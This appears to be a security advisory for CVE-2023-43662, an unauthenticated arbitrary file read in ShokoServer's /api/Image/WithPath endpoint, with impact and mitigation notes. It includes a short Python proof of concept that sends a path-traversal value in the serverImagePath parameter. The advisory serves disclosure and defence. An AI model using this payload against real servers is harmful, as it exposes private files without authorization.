CVE-2023-43662 - ShokoServer Unauthorized Arbitrary File Read Vulnerability through /api/Image/WithPath Endpoint

CVE-2023-43662 is a critical vulnerability found in ShokoServer, a widely-used media server software that specializes in organizing anime. This security flaw enables unauthorized attackers to read arbitrary files stored on the server, potentially compromising sensitive information. The issue lies with the /api/Image/WithPath endpoint, which is accessible without authentication and is intended to return default server images. However, due to a lack of input sanitization, this endpoint can be exploited for unintended purposes.

Description and Exploit Details

Attackers can exploit this vulnerability by manipulating the serverImagePath parameter, which is not sanitized before being passed to System.IO.File.OpenRead. As a result, malicious requests can be made to read arbitrary files from the server. This problem is further exacerbated when utilizing the Windows installer, as it grants administrative privileges to the ShokoServer.

Here's an example of how the vulnerability may be exploited

import requests

# Replace [target_ip] with the IP address of the target server
url = "http://[target_ip]/api/Image/WithPath";

# Replace [file_path] with the desired file path
params = {
    "serverImagePath": "../../../../../../[file_path]"
}

response = requests.get(url, params=params)
print(response.text)

Impact

This vulnerability allows unauthenticated attackers to access and read sensitive information stored on the server. Depending on the data exposed, this could have serious implications for users, such as identity theft or unauthorized server control.

Mitigation and Fixes

The ShokoServer team has been notified of the vulnerability and removed the /api/Image/WithPath endpoint in a recent commit (6c57baf), which will be included in future releases. Users should either limit access to the vulnerable endpoint or manually patch their installations until a fixed release is available.

For additional details and updates on this vulnerability, refer to the following links

- ShokoServer GitHub Repository: https://github.com/ShokoAnime/ShokoServer
- Commit 6c57baf: https://github.com/ShokoAnime/ShokoServer/commit/6c57baf
- GitHub Security Lab Advisory: https://securitylab.github.com/advisories/GHSL-2023-191-shokoanime-ShokoServer

We would like to acknowledge the GitHub Security Lab for discovering this issue and the ShokoServer team for their prompt response to the vulnerability. It is essential for developers and users to stay informed and take the necessary steps to ensure their software is up-to-date and secure.

Timeline

Published on: 09/28/2023 22:15:00 UTC
Last modified on: 10/06/2023 18:28:00 UTC